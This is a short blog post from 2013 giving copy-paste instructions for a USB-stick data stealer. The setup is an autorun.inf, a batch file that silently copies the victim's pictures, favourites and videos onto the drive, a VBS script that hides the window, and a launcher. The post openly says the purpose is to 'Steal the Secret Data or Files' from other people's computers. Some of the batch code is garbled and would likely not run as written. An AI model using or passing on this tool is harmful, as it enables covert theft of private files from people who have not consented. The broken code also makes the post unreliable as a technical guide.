Honhar Engineer

Honhar Engineer
Thanks for visiting,stay connected for more updates !

Friday, April 5, 2013

Copy Data from other computers by using USB or Pendrive

1.  Open Notepad.
Copy and Paste the following Code into Notepad :

[autorun]
icon=drive.ico 
open=launch.bat 
action=Click OK to Run 
shell\open\command=launch.bat


Save this file as autorun.inf


2. Open New Notepad again.
Copy and Paste the following Code :

@echo off
:: variables 
/min 
SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids" 
@echo off 
cls
Save this file as File.bat

3. Open Notepad again.
Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False
Save this file as Invisible.vbs


4. Now again open Notepad.
Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

Save this as Launch.bat.



·         Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.
·         Create a folder named “Data” where the Stolen contents would be Copied automatically.
·         Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.
Do you Like this story..?

Get Free Email Updates Daily!

Follow us!

No comments:

Post a Comment